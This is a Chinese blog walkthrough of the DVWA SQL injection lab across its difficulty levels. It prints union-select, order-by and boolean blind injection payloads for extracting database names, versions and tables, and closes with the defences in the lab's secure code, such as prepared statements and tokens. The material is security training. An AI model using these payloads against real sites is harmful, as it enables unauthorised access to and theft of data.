dvwa7——SQL Injection

LOW:

f12打开hackbar

一:判断注入类型

输入id=1'报错

闭合单引号 ,页面恢复正常

所以为单引号字符型

二:开始攻击

1.判断列数

复制代码
?id=1' order by 2--+

到3的时候开始报错,所以一共两列

2.爆回显位置

复制代码
?id=-1' union select 2,3--+

3.爆数据库名和版本号

复制代码
?id=-1' union select database(),version()--+

4.爆表名

复制代码
?id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

5.爆库名

(1)guestbook

(2)users

6.爆guestbook的数据:

MEDIUM:

发现界面变成了这样:

随便提交一个,submit的时候用bp抓包

抓到这些,我们发现这一关的提交形式从get变成了post,格式以红框内为准

继续打开hackbar,发现单引号双引号括号无论闭合不闭合都报错,所以我们判断为数字型

复制代码
id=1 order by 3&Submit=Submit

到3的时候报错,所以一共两列

剩下的表单爆数据不再过多赘述

HIGH:

直接输入前边无正确回显,可以用盲注,参考这一章

复制代码
1' and 1=1#
1' and 1=2#

前者正常,后者无回显,所以是字符型注入,参考这一篇

sqli---labs第八关------布尔盲注_sqli-labs盲注脚本-CSDN博客

IMPOSSIBLE:

优化部分:

复制代码
checkToken($_REQUEST['user_token'], $_SESSION['session_token'], 'index.php');

1.checktoken()

2.mysqli_real_escape_string()转义函数去除反斜杠

3.pdo预处理,参数化查询

4.limit 1限制返回结果

5.generateSessionToken()在文件末尾生成新token供下次使用

6.captcha验证(recaptcha_check_answer())(人机验证)

相关推荐
Paraverse_徐志斌7 分钟前
RAG架构(检索增强生成)与向量数据库
数据库·ai·llm·embedding·milvus·rag
NineData1 小时前
NineData将亮相第27届GOPS全球运维大会,并带来技术演讲
运维·数据库·ninedata·智能·ai agent·数据管理工具·gops全球运维大会
合作小小程序员小小店1 小时前
Web渗透之身份认证与访问控制缺陷(越权(水平垂直),访问控制(没有验证),脆弱验证(Cookie,JWT,Session等))
安全·web安全·网络安全·asp.net·网络攻击模型
不良人天码星2 小时前
谈谈redis的持久化
数据库·redis·缓存
qq_479875432 小时前
TimerFd & Epoll
java·服务器·数据库
绵绵细雨中的乡音3 小时前
MySQL 数据库核心操作全解析:从创建到备份与连接管理
数据库·oracle
wayuncn4 小时前
哈尔滨电商企业服务器托管方案
运维·服务器·数据库
重整旗鼓~5 小时前
27.Redisson基本使用和可重入性
数据库·redis·缓存
瑶总迷弟5 小时前
使用 Docker 和 docker-compose 快速部署 openGauss
linux·数据库·云原生·eureka
C.R.xing5 小时前
Pyspark分布式访问NebulaGraph图数据库
数据库·分布式·python·pyspark·nebulagraph